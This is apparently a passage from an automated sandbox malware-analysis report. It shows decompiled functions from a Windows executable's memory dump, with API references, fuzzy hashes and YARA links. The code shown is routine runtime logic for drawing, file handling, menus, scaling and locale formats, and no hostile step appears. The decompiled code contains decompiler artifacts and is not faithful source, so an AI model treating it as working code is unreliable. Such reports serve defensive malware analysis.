						_t136 = E004140D0( *((intOrPtr*)(_t161 + 0x198)), _t160);
						if( *((char*)(_t136 + 0x57)) != 0 || ( *(_t136 + 0x1c) & 0x00000010) != 0 && ( *(_t136 + 0x51) & 0x00000004) == 0) {
							E00412AB0( *((intOrPtr*)(_t136 + 0x40)),  *((intOrPtr*)(_t136 + 0x40)) +  *(_t136 + 0x48),  *((intOrPtr*)(_t136 + 0x44)),  &(_v44.bottom),  *((intOrPtr*)(_t136 + 0x44)) +  *(_t136 + 0x4c));
							if(RectVisible(_t162,  &(_v44.top)) != 0) {
								if(( *(_t161 + 0x54) & 0x00000080) != 0) {
									 *(_t136 + 0x54) =  *(_t136 + 0x54) | 0x00000080;
								}
								_v60.top = SaveDC(_t162);
								E004375F8(_t162,  *((intOrPtr*)(_t136 + 0x44)),  *((intOrPtr*)(_t136 + 0x40)));
								IntersectClipRect(_t162, 0, 0,  *(_t136 + 0x48),  *(_t136 + 0x4c));
								E00439EA4(_t136, _t162, 0xf, 0);
								RestoreDC(_t162, _v80);
								 *(_t136 + 0x54) =  *(_t136 + 0x54) & 0x0000ff7f;
							}
						}
						_t160 = _t160 + 1;
					} while (_t160 < _v60.top);
				}
			}

0x0043d220
0x0043d223
0x0043d225
0x0043d227
0x0043d230
0x0043d24e
0x0043d24e
0x0043d251
0x0043d259
0x0043d33e
0x0043d33e
0x0043d346
0x0043d44b
0x0043d44b
0x0043d44b
0x0043d34f
0x0043d352
0x00000000
0x00000000
0x0043d359
0x0043d35d
0x0043d35f
0x0043d367
0x0043d36c
0x0043d375
0x0043d3af
0x0043d3d2
0x0043d3dd
0x0043d3e7
0x0043d3fc
0x0043d41f
0x0043d42a
0x0043d434
0x0043d434
0x0043d439
0x0043d43a
0x0043d43a
0x0043d43a
0x00000000
0x0043d35f
0x0043d25f
0x0043d263
0x0043d26c
0x0043d270
0x0043d272
0x0043d272
0x0043d270
0x0043d27d
0x0043d283
0x0043d289
0x0043d296
0x0043d29c
0x0043d2ca
0x0043d2dc
0x0043d2e2
0x0043d2e4
0x0043d2e4
0x0043d2f0
0x0043d2fc
0x0043d30e
0x0043d31e
0x0043d329
0x0043d32e
0x0043d32e
0x0043d2dc
0x0043d334
0x0043d335
0x0043d289

APIs

RectVisible.GDI32(?,?), ref: 0043D2D5
SaveDC.GDI32(?), ref: 0043D2EB
IntersectClipRect.GDI32(?,00000000,00000000,?,?), ref: 0043D30E
RestoreDC.GDI32(?,?), ref: 0043D329
CreateSolidBrush.GDI32(00000000), ref: 0043D3AA
FrameRect.USER32 ref: 0043D3DD
DeleteObject.GDI32(?), ref: 0043D3E7
CreateSolidBrush.GDI32(00000000), ref: 0043D3F7
FrameRect.USER32 ref: 0043D42A
DeleteObject.GDI32(?), ref: 0043D434

Memory Dump Source

Source File: 00000000.00000002.680147220.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.680142416.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680210304.0000000000471000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680214563.0000000000472000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680220972.000000000048E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680224863.000000000048F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680231441.0000000000495000.00000002.00020000.sdmp Download File

Similarity

API ID: Rect$BrushCreateDeleteFrameObjectSolid$ClipIntersectRestoreSaveVisible
String ID:
API String ID: 375863564-0
Opcode ID: 97df9983e15ef8ceda8ab448a53d1e4c662b6221a728d2c013ee12b8651ae6d4
Instruction ID: c53d7df7957da8c8db820a683e6eb8b43efda75dadf9deecc680389a81426049
Opcode Fuzzy Hash: 97df9983e15ef8ceda8ab448a53d1e4c662b6221a728d2c013ee12b8651ae6d4
Instruction Fuzzy Hash: 96518E716042409FDB14EF69D8C4B5B77E8AF89308F04445EEE89CB287D679EC44CB59

Uniqueness

Uniqueness Score: -1.00%

Function 00402B18, Relevance: 15.1, APIs: 10, Instructions: 129
fileCOMMON

Download Yara Rule

C-Code - Quality: 70%

			E00402B18(void** __eax) {
				long _t29;
				void* _t31;
				long _t34;
				void* _t38;
				void* _t40;
				long _t41;
				int _t44;
				void* _t46;
				long _t54;
				long _t55;
				void* _t58;
				void** _t59;
				DWORD* _t60;

				_t59 = __eax;
				 *((intOrPtr*)(__eax + 0xc)) = 0;
				 *((intOrPtr*)(__eax + 0x10)) = 0;
				if(0xffffffffffff284f == 0) {
					_t29 = 0x80000000;
					_t55 = 1;
					_t54 = 3;
					 *((intOrPtr*)(__eax + 0x1c)) = 0x402a6c;
				} else {
					if(0xffffffffffff284f == 0) {
						_t29 = 0x40000000;
						_t55 = 1;
						_t54 = 2;
					} else {
						if(0xffffffffffff284f != 0) {
							return 0xffffffffffff284d;
						}
						_t29 = 0xc0000000;
						_t55 = 1;
						_t54 = 3;
					}
					_t59[7] = E00402AAC;
				}
				_t59[9] = E00402AF8;
				_t59[8] = E00402AA8;
				if(_t59[0x12] == 0) {
					_t59[2] = 0x80;
					_t59[9] = E00402AA8;
					_t59[5] =  &(_t59[0x53]);
					if(_t59[1] == 0xd7b2) {
						if(_t59 != 0x48f3e4) {
							_push(0xfffffff5);
						} else {
							_push(0xfffffff4);
						}
					} else {
						_push(0xfffffff6);
					}
					_t31 = GetStdHandle();
					if(_t31 == 0xffffffff) {
						goto L37;
					}
					 *_t59 = _t31;
					goto L30;
				} else {
					_t38 = CreateFileA( &(_t59[0x12]), _t29, _t55, 0, _t54, 0x80, 0);
					if(_t38 == 0xffffffff) {
						L37:
						_t59[1] = 0xd7b0;
						return GetLastError();
					}
					 *_t59 = _t38;
					if(_t59[1] != 0xd7b3) {
						L30:
						if(_t59[1] == 0xd7b1) {
							L34:
							return 0;
						}
						_t34 = GetFileType( *_t59);
						if(_t34 == 0) {
							CloseHandle( *_t59);
							_t59[1] = 0xd7b0;
							return 0x69;
						}
						if(_t34 == 2) {
							_t59[8] = E00402AAC;
						}
						goto L34;
					}
					_t59[1] = _t59[1] - 1;
					_t40 = GetFileSize( *_t59, 0) + 1;
					if(_t40 == 0) {
						goto L37;
					}
					_t41 = _t40 - 0x81;
					if(_t41 < 0) {
						_t41 = 0;
					}
					if(SetFilePointer( *_t59, _t41, 0, 0) + 1 == 0) {
						goto L37;
					} else {
						_t44 = ReadFile( *_t59,  &(_t59[0x53]), 0x80, _t60, 0);
						_t58 = 0;
						if(_t44 != 1) {
							goto L37;
						}
						_t46 = 0;
						while(_t46 < _t58) {
							if( *((char*)(_t59 + _t46 + 0x14c)) == 0xe) {
								if(SetFilePointer( *_t59, _t46 - _t58, 0, 2) + 1 == 0 || SetEndOfFile( *_t59) != 1) {
									goto L37;
								} else {
									goto L30;
								}
							}
							_t46 = _t46 + 1;
						}
						goto L30;
					}
				}
			}

0x00402b19
0x00402b1d
0x00402b20
0x00402b2c
0x00402b39
0x00402b3e
0x00402b43
0x00402b48
0x00402b2e
0x00402b2f
0x00402b51
0x00402b56
0x00402b5b
0x00402b31
0x00402b32
0x00000000
0x00000000
0x00402b62
0x00402b67
0x00402b6c
0x00402b6c
0x00402b71
0x00402b71
0x00402b78
0x00402b7f
0x00402b8a
0x00402c48
0x00402c4f
0x00402c56
0x00402c5f
0x00402c6b
0x00402c71
0x00402c6d
0x00402c6d
0x00402c6d
0x00402c61
0x00402c61
0x00402c61
0x00402c73
0x00402c7b
0x00000000
0x00000000
0x00402c7d
0x00000000
0x00402b90
0x00402ba0
0x00402ba8
0x00402cb6
0x00402cb6
0x00000000
0x00402cbc
0x00402bae
0x00402bb6
0x00402c7f
0x00402c85
0x00402c9e
0x00000000
0x00402c9e
0x00402c89
0x00402c90
0x00402ca4
0x00402ca9
0x00000000
0x00402caf
0x00402c95
0x00402c97
0x00402c97
0x00000000
0x00402c95
0x00402bbc
0x00402bc9
0x00402bca
0x00000000
0x00000000
0x00402bd0
0x00402bd5
0x00402bd7
0x00402bd7
0x00402be6
0x00000000
0x00402bec
0x00402c01
0x00402c06
0x00402c08
0x00000000
0x00000000
0x00402c0e
0x00402c10
0x00402c1c
0x00402c30
0x00000000
0x00402c40
0x00000000
0x00402c40
0x00402c30
0x00402c1e
0x00402c1e
0x00000000
0x00402c10
0x00402be6

APIs

CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00402BA0
GetFileSize.KERNEL32(?,00000000,00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00402BC4
SetFilePointer.KERNEL32(?,-00000080,00000000,00000000,?,00000000,00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00402BE0
ReadFile.KERNEL32(?,?,00000080,?,00000000,00000000,?,-00000080,00000000,00000000,?,00000000,00000000,80000000,00000001,00000000), ref: 00402C01
SetFilePointer.KERNEL32(?,00000000,00000000,00000002), ref: 00402C2A
SetEndOfFile.KERNEL32(?,?,00000000,00000000,00000002), ref: 00402C38
GetStdHandle.KERNEL32(000000F5), ref: 00402C73
GetFileType.KERNEL32(?,000000F5), ref: 00402C89
CloseHandle.KERNEL32(?,?,000000F5), ref: 00402CA4
GetLastError.KERNEL32(000000F5), ref: 00402CBC

Memory Dump Source

Source File: 00000000.00000002.680147220.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.680142416.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680210304.0000000000471000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680214563.0000000000472000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680220972.000000000048E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680224863.000000000048F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680231441.0000000000495000.00000002.00020000.sdmp Download File

Similarity

API ID: File$HandlePointer$CloseCreateErrorLastReadSizeType
String ID:
API String ID: 1694776339-0
Opcode ID: 80a050c019947318a92831656a408fafd0f578acc5d5c69c0c1d70747e811a6c
Instruction ID: 975840f4674e4f171413811f9c4b8c0f4834828094a83cfad36f4eac295fad15
Opcode Fuzzy Hash: 80a050c019947318a92831656a408fafd0f578acc5d5c69c0c1d70747e811a6c
Instruction Fuzzy Hash: AB41A170108700AAF7309F24CB0DB2B76E5AB41754F208A3FE596B66E0E7FDA841874D

Uniqueness

Uniqueness Score: -1.00%

Function 004545F4, Relevance: 15.1, APIs: 10, Instructions: 74
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004545F4(intOrPtr _a4) {
				intOrPtr _t27;
				struct HMENU__* _t48;

				_t27 =  *((intOrPtr*)(_a4 - 4));
				if( *((char*)(_t27 + 0x229)) != 0) {
					_t27 =  *((intOrPtr*)(_a4 - 4));
					if(( *(_t27 + 0x228) & 0x00000001) != 0) {
						_t27 =  *((intOrPtr*)(_a4 - 4));
						if( *((char*)(_t27 + 0x22f)) != 1) {
							_t48 = GetSystemMenu(E0043F370( *((intOrPtr*)(_a4 - 4))), 0);
							if( *((char*)( *((intOrPtr*)(_a4 - 4)) + 0x229)) == 3) {
								DeleteMenu(_t48, 0xf130, 0);
								DeleteMenu(_t48, 7, 0x400);
								DeleteMenu(_t48, 5, 0x400);
								DeleteMenu(_t48, 0xf030, 0);
								DeleteMenu(_t48, 0xf020, 0);
								DeleteMenu(_t48, 0xf000, 0);
								return DeleteMenu(_t48, 0xf120, 0);
							}
							if(( *( *((intOrPtr*)(_a4 - 4)) + 0x228) & 0x00000002) == 0) {
								EnableMenuItem(_t48, 0xf020, 1);
							}
							_t27 =  *((intOrPtr*)(_a4 - 4));
							if(( *(_t27 + 0x228) & 0x00000004) == 0) {
								return EnableMenuItem(_t48, 0xf030, 1);
							}
						}
					}
				}
				return _t27;
			}

0x004545fb
0x00454605
0x0045460e
0x00454618
0x00454621
0x0045462b
0x00454644
0x00454653
0x0045465d
0x0045466a
0x00454677
0x00454684
0x00454691
0x0045469e
0x00000000
0x004546ab
0x004546bf
0x004546c9
0x004546c9
0x004546d1
0x004546db
0x00000000
0x004546e5
0x004546db
0x0045462b
0x00454618
0x004546ec

APIs

GetSystemMenu.USER32(00000000,00000000), ref: 0045463F
DeleteMenu.USER32(00000000,0000F130,00000000,00000000,00000000), ref: 0045465D
DeleteMenu.USER32(00000000,00000007,00000400,00000000,0000F130,00000000,00000000,00000000), ref: 0045466A
DeleteMenu.USER32(00000000,00000005,00000400,00000000,00000007,00000400,00000000,0000F130,00000000,00000000,00000000), ref: 00454677
DeleteMenu.USER32(00000000,0000F030,00000000,00000000,00000005,00000400,00000000,00000007,00000400,00000000,0000F130,00000000,00000000,00000000), ref: 00454684
DeleteMenu.USER32(00000000,0000F020,00000000,00000000,0000F030,00000000,00000000,00000005,00000400,00000000,00000007,00000400,00000000,0000F130,00000000,00000000), ref: 00454691
DeleteMenu.USER32(00000000,0000F000,00000000,00000000,0000F020,00000000,00000000,0000F030,00000000,00000000,00000005,00000400,00000000,00000007,00000400,00000000), ref: 0045469E
DeleteMenu.USER32(00000000,0000F120,00000000,00000000,0000F000,00000000,00000000,0000F020,00000000,00000000,0000F030,00000000,00000000,00000005,00000400,00000000), ref: 004546AB
EnableMenuItem.USER32 ref: 004546C9
EnableMenuItem.USER32 ref: 004546E5

Memory Dump Source

Source File: 00000000.00000002.680147220.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.680142416.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680210304.0000000000471000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680214563.0000000000472000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680220972.000000000048E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680224863.000000000048F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680231441.0000000000495000.00000002.00020000.sdmp Download File

Similarity

API ID: Menu$Delete$EnableItem$System
String ID:
API String ID: 3985193851-0
Opcode ID: 50ac3faa65d9bf8917a7dbb5e0254a0d7f6f1681c214fc484fb03e34fba16766
Instruction ID: 9b3a4a6820cd94ae06c46ec8a4a805dd92a5f7564af97d374b957c15bc4db389
Opcode Fuzzy Hash: 50ac3faa65d9bf8917a7dbb5e0254a0d7f6f1681c214fc484fb03e34fba16766
Instruction Fuzzy Hash: 35218E743803007AE320EA24CC8EF5A7AD85F54B1AF1140A5BA097F2D3C6FCE990965C

Uniqueness

Uniqueness Score: -1.00%

Function 004388D8, Relevance: 13.6, APIs: 9, Instructions: 150
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004388D8(intOrPtr* __eax, int __ecx, int __edx) {
				char _t62;
				signed int _t64;
				signed int _t65;
				signed char _t107;
				intOrPtr _t113;
				intOrPtr _t114;
				int _t117;
				intOrPtr* _t118;
				int _t119;
				int* _t121;

				 *_t121 = __ecx;
				_t117 = __edx;
				_t118 = __eax;
				if(__edx ==  *_t121) {
					L29:
					_t62 =  *0x438a84; // 0x0
					 *((char*)(_t118 + 0x98)) = _t62;
					return _t62;
				}
				if(( *(__eax + 0x1c) & 0x00000001) == 0) {
					_t107 =  *0x438a7c; // 0x1f
				} else {
					_t107 =  *((intOrPtr*)(__eax + 0x98));
				}
				if((_t107 & 0x00000001) == 0) {
					_t119 =  *(_t118 + 0x40);
				} else {
					_t119 = MulDiv( *(_t118 + 0x40), _t117,  *_t121);
				}
				if((_t107 & 0x00000002) == 0) {
					_t121[1] =  *(_t118 + 0x44);
				} else {
					_t121[1] = MulDiv( *(_t118 + 0x44), _t117,  *_t121);
				}
				if((_t107 & 0x00000004) == 0 || ( *(_t118 + 0x51) & 0x00000001) != 0) {
					_t64 =  *(_t118 + 0x48);
					_t121[2] = _t64;
				} else {
					if((_t107 & 0x00000001) == 0) {
						_t64 = MulDiv( *(_t118 + 0x48), _t117,  *_t121);
						_t121[2] = _t64;
					} else {
						_t64 = MulDiv( *(_t118 + 0x40) +  *(_t118 + 0x48), _t117,  *_t121) - _t119;
						_t121[2] = _t64;
					}
				}
				_t65 = _t64 & 0xffffff00 | (_t107 & 0x00000008) != 0x00000000;
				if(_t65 == 0 || ( *(_t118 + 0x51) & 0x00000002) != 0) {
					_t121[3] =  *(_t118 + 0x4c);
				} else {
					if(_t65 == 0) {
						_t121[3] = MulDiv( *(_t118 + 0x44), _t117,  *_t121);
					} else {
						_t121[3] = MulDiv( *(_t118 + 0x44) +  *(_t118 + 0x4c), _t117,  *_t121) - _t121[1];
					}
				}
				 *((intOrPtr*)( *_t118 + 0x84))(_t121[4], _t121[2]);
				_t113 =  *0x438a84; // 0x0
				if(_t113 != (_t107 &  *0x438a80)) {
					 *(_t118 + 0x90) = MulDiv( *(_t118 + 0x90), _t117,  *_t121);
				}
				_t114 =  *0x438a84; // 0x0
				if(_t114 != (_t107 &  *0x438a88)) {
					 *(_t118 + 0x94) = MulDiv( *(_t118 + 0x94), _t117,  *_t121);
				}
				if( *((char*)(_t118 + 0x59)) == 0 && (_t107 & 0x00000010) != 0) {
					E0041F26C( *((intOrPtr*)(_t118 + 0x68)), MulDiv(E0041F250( *((intOrPtr*)(_t118 + 0x68))), _t117,  *_t121));
				}
				goto L29;
			}

0x004388df
0x004388e2
0x004388e4
0x004388e9
0x00438a66
0x00438a66
0x00438a6b
0x00438a78
0x00438a78
0x004388f3
0x004388fd
0x004388f5
0x004388f5
0x004388f5
0x00438906
0x0043891a
0x00438908
0x00438916
0x00438916
0x00438920
0x00438939
0x00438922
0x00438930
0x00438930
0x00438940
0x0043897a
0x0043897d
0x00438948
0x0043894b
0x0043896f
0x00438974
0x0043894d
0x0043895e
0x00438960
0x00438960
0x0043894b
0x00438984
0x00438989
0x004389cd
0x00438991
0x00438999
0x004389c4
0x0043899b
0x004389b0
0x004389b0
0x00438999
0x004389e5
0x004389f3
0x004389fb
0x00438a0e
0x00438a0e
0x00438a1c
0x00438a24
0x00438a37
0x00438a37
0x00438a41
0x00438a61
0x00438a61
0x00000000

APIs

MulDiv.KERNEL32(?,?,?), ref: 00438911
MulDiv.KERNEL32(?,?,?), ref: 0043892B
MulDiv.KERNEL32(?,?,?), ref: 00438959
MulDiv.KERNEL32(?,?,?), ref: 0043896F
MulDiv.KERNEL32(?,?,?), ref: 004389A7
MulDiv.KERNEL32(?,?,?), ref: 004389BF
MulDiv.KERNEL32(?,?,0000001F), ref: 00438A09
MulDiv.KERNEL32(?,?,0000001F), ref: 00438A32
MulDiv.KERNEL32(00000000,?,0000001F), ref: 00438A58

Part of subcall function 0041F26C: MulDiv.KERNEL32(00000000,?,00000048), ref: 0041F279

Memory Dump Source

Source File: 00000000.00000002.680147220.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.680142416.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680210304.0000000000471000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680214563.0000000000472000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680220972.000000000048E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680224863.000000000048F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680231441.0000000000495000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0eb9bc0cfed60d8f2438ab8ec71c49a088dc674c92744079aced1de76ce3ef19
Instruction ID: 052a49027f109bdbea74fea11780eb42fdffda8159d45cf778c627c090aad4d3
Opcode Fuzzy Hash: 0eb9bc0cfed60d8f2438ab8ec71c49a088dc674c92744079aced1de76ce3ef19
Instruction Fuzzy Hash: AE5153B1608740AFC320EB69C945B6BF7EDAF49304F04581EB9D6C7752CA39E844CB55

Uniqueness

Uniqueness Score: -1.00%

Function 004397AC, Relevance: 13.6, APIs: 9, Instructions: 122
windowCOMMON

Download Yara Rule

C-Code - Quality: 37%

			E004397AC(void* __ebx, char __ecx, intOrPtr* __edx, void* __edi, void* __esi) {
				char _v5;
				struct HDC__* _v12;
				struct HDC__* _v16;
				void* _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				int _v32;
				int _v36;
				struct HDC__* _t33;
				intOrPtr _t72;
				int _t74;
				intOrPtr _t80;
				int _t83;
				void* _t88;
				int _t89;
				void* _t92;
				void* _t93;
				intOrPtr _t94;

				_t92 = _t93;
				_t94 = _t93 + 0xffffffe0;
				_v5 = __ecx;
				_t74 =  *((intOrPtr*)( *__edx + 0x38))();
				if(_v5 == 0) {
					_push(__edx);
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_pop(_t88);
				} else {
					_push(__edx);
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_pop(_t88);
				}
				_v12 = GetDesktopWindow();
				_push(0x402);
				_push(0);
				_t33 = _v12;
				_push(_t33);
				L00406E38();
				_v16 = _t33;
				_push(_t92);
				_push(0x4398c7);
				_push( *[fs:eax]);
				 *[fs:eax] = _t94;
				_v20 = SelectObject(_v16, E0041F7EC( *((intOrPtr*)(_t88 + 0x40))));
				_t89 = _v36;
				_t83 = _v32;
				PatBlt(_v16, _t89 + _t74, _t83, _v28 - _t89 - _t74, _t74, 0x5a0049);
				PatBlt(_v16, _v28 - _t74, _t83 + _t74, _t74, _v24 - _t83 - _t74, 0x5a0049);
				PatBlt(_v16, _t89, _v24 - _t74, _v28 - _v36 - _t74, _t74, 0x5a0049);
				PatBlt(_v16, _t89, _t83, _t74, _v24 - _v32 - _t74, 0x5a0049);
				SelectObject(_v16, _v20);
				_pop(_t80);
				 *[fs:eax] = _t80;
				_push(0x4398ce);
				_push(_v16);
				_t72 = _v12;
				_push(_t72);
				L00407090();
				return _t72;
			}

0x004397ad
0x004397af
0x004397b5
0x004397c1
0x004397c7
0x004397d7
0x004397de
0x004397df
0x004397e0
0x004397e1
0x004397e2
0x004397c9
0x004397c9
0x004397d0
0x004397d1
0x004397d2
0x004397d3
0x004397d4
0x004397d4
0x004397e8
0x004397eb
0x004397f0
0x004397f2
0x004397f5
0x004397f6
0x004397fb
0x00439800
0x00439801
0x00439806
0x00439809
0x0043981e
0x0043982a
0x00439832
0x0043983f
0x00439861
0x00439880
0x0043989a
0x004398a7
0x004398ae
0x004398b1
0x004398b4
0x004398bc
0x004398bd
0x004398c0
0x004398c1
0x004398c6

APIs

GetDesktopWindow.USER32 ref: 004397E3
72E7ACE0.USER32(?,00000000,00000402), ref: 004397F6
SelectObject.GDI32(?,00000000), ref: 00439819
PatBlt.GDI32(?,?,?,?,00000000,005A0049), ref: 0043983F
PatBlt.GDI32(?,?,?,00000000,?,005A0049), ref: 00439861
PatBlt.GDI32(?,?,?,?,00000000,005A0049), ref: 00439880
PatBlt.GDI32(?,?,?,00000000,?,005A0049), ref: 0043989A
SelectObject.GDI32(?,?), ref: 004398A7
72E7B380.USER32(?,?,004398CE,?,?,00000000,?,005A0049,?,?,?,?,00000000,005A0049,?,?), ref: 004398C1

Memory Dump Source

Source File: 00000000.00000002.680147220.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.680142416.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680210304.0000000000471000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680214563.0000000000472000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680220972.000000000048E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680224863.000000000048F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680231441.0000000000495000.00000002.00020000.sdmp Download File

Similarity

API ID: ObjectSelect$B380DesktopWindow
String ID:
API String ID: 989747725-0
Opcode ID: 60908d0d594285389da0a0a3cb5a0c49e681993fe6579408db9c9f070288334e
Instruction ID: 10f697c9835ed7b35a3ef1119485ac8593720ca4e0e8d00e39ed6a19d1ea9661
Opcode Fuzzy Hash: 60908d0d594285389da0a0a3cb5a0c49e681993fe6579408db9c9f070288334e
Instruction Fuzzy Hash: 6231FBB6E00219AFDB00DEEDCC85DAFBBBCAF49704F414565B514F7281C679AD048BA4

Uniqueness

Uniqueness Score: -1.00%

Function 0040AF50, Relevance: 12.5, APIs: 1, Strings: 6, Instructions: 201
threadCOMMON

Download Yara Rule

C-Code - Quality: 72%

			E0040AF50(void* __ebx, void* __edx, void* __edi, void* __esi) {
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				char _v40;
				char _v44;
				char _v48;
				char _v52;
				char _v56;
				char _v60;
				char _v64;
				char _v68;
				void* _t104;
				void* _t111;
				void* _t133;
				intOrPtr _t183;
				intOrPtr _t193;
				intOrPtr _t194;

				_t191 = __esi;
				_t190 = __edi;
				_t193 = _t194;
				_t133 = 8;
				do {
					_push(0);
					_push(0);
					_t133 = _t133 - 1;
				} while (_t133 != 0);
				_push(__ebx);
				_push(_t193);
				_push(0x40b21b);
				_push( *[fs:eax]);
				 *[fs:eax] = _t194;
				E0040ADDC();
				E004099F0(__ebx, __edi, __esi);
				_t196 =  *0x48f7fc;
				if( *0x48f7fc != 0) {
					E00409BC8(__esi, _t196);
				}
				_t132 = GetThreadLocale();
				E00409940(_t43, 0, 0x14,  &_v20);
				E00404374(0x48f730, _v20);
				E00409940(_t43, 0x40b230, 0x1b,  &_v24);
				 *0x48f734 = E00408740(0x40b230, 0, _t196);
				E00409940(_t132, 0x40b230, 0x1c,  &_v28);
				 *0x48f735 = E00408740(0x40b230, 0, _t196);
				 *0x48f736 = E0040998C(_t132, 0x2c, 0xf);
				 *0x48f737 = E0040998C(_t132, 0x2e, 0xe);
				E00409940(_t132, 0x40b230, 0x19,  &_v32);
				 *0x48f738 = E00408740(0x40b230, 0, _t196);
				 *0x48f739 = E0040998C(_t132, 0x2f, 0x1d);
				E00409940(_t132, "m/d/yy", 0x1f,  &_v40);
				E00409C78(_v40, _t132,  &_v36, _t190, _t191, _t196);
				E00404374(0x48f73c, _v36);
				E00409940(_t132, "mmmm d, yyyy", 0x20,  &_v48);
				E00409C78(_v48, _t132,  &_v44, _t190, _t191, _t196);
				E00404374(0x48f740, _v44);
				 *0x48f744 = E0040998C(_t132, 0x3a, 0x1e);
				E00409940(_t132, 0x40b264, 0x28,  &_v52);
				E00404374(0x48f748, _v52);
				E00409940(_t132, 0x40b270, 0x29,  &_v56);
				E00404374(0x48f74c, _v56);
				E00404320( &_v12);
				E00404320( &_v16);
				E00409940(_t132, 0x40b230, 0x25,  &_v60);
				_t104 = E00408740(0x40b230, 0, _t196);
				_t197 = _t104;
				if(_t104 != 0) {
					E004043B8( &_v8, 0x40b288);
				} else {
					E004043B8( &_v8, 0x40b27c);
				}
				E00409940(_t132, 0x40b230, 0x23,  &_v64);
				_t111 = E00408740(0x40b230, 0, _t197);
				_t198 = _t111;
				if(_t111 == 0) {
					E00409940(_t132, 0x40b230, 0x1005,  &_v68);
					if(E00408740(0x40b230, 0, _t198) != 0) {
						E004043B8( &_v12, 0x40b2a4);
					} else {
						E004043B8( &_v16, 0x40b294);
					}
				}
				_push(_v12);
				_push(_v8);
				_push(":mm");
				_push(_v16);
				E00404698();
				_push(_v12);
				_push(_v8);
				_push(":mm:ss");
				_push(_v16);
				E00404698();
				 *0x48f7fe = E0040998C(_t132, 0x2c, 0xc);
				_pop(_t183);
				 *[fs:eax] = _t183;
				_push(E0040B222);
				return E00404344( &_v68, 0x10);
			}

0x0040af50
0x0040af50
0x0040af51
0x0040af53
0x0040af58
0x0040af58
0x0040af5a
0x0040af5c
0x0040af5c
0x0040af5f
0x0040af62
0x0040af63
0x0040af68
0x0040af6b
0x0040af6e
0x0040af73
0x0040af78
0x0040af7f
0x0040af81
0x0040af81
0x0040af8b
0x0040af9a
0x0040afa7
0x0040afbc
0x0040afcb
0x0040afe0
0x0040afef
0x0040b002
0x0040b015
0x0040b02a
0x0040b039
0x0040b04c
0x0040b061
0x0040b06c
0x0040b079
0x0040b08e
0x0040b099
0x0040b0a6
0x0040b0b9
0x0040b0ce
0x0040b0db
0x0040b0f0
0x0040b0fd
0x0040b105
0x0040b10d
0x0040b122
0x0040b12c
0x0040b131
0x0040b133
0x0040b14c
0x0040b135
0x0040b13d
0x0040b13d
0x0040b161
0x0040b16b
0x0040b170
0x0040b172
0x0040b184
0x0040b195
0x0040b1ae
0x0040b197
0x0040b19f
0x0040b19f
0x0040b195
0x0040b1b3
0x0040b1b6
0x0040b1b9
0x0040b1be
0x0040b1cb
0x0040b1d0
0x0040b1d3
0x0040b1d6
0x0040b1db
0x0040b1e8
0x0040b1fb
0x0040b202
0x0040b205
0x0040b208
0x0040b21a

APIs

GetThreadLocale.KERNEL32(00000000,0040B21B,?,?,00000000,00000000), ref: 0040AF86

Part of subcall function 00409940: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 0040995E

Strings

AMPM, xrefs: 0040B19A
mmmm d, yyyy, xrefs: 0040B082
m/d/yy, xrefs: 0040B055
:mm:ss, xrefs: 0040B1D6
AMPM , xrefs: 0040B1A9
:mm, xrefs: 0040B1B9

Memory Dump Source

Source File: 00000000.00000002.680147220.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.680142416.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680210304.0000000000471000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680214563.0000000000472000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680220972.000000000048E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680224863.000000000048F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680231441.0000000000495000.00000002.00020000.sdmp Download File

Similarity

API ID: Locale$InfoThread
String ID: AMPM$:mm$:mm:ss$AMPM $m/d/yy$mmmm d, yyyy
API String ID: 4232894706-2493093252
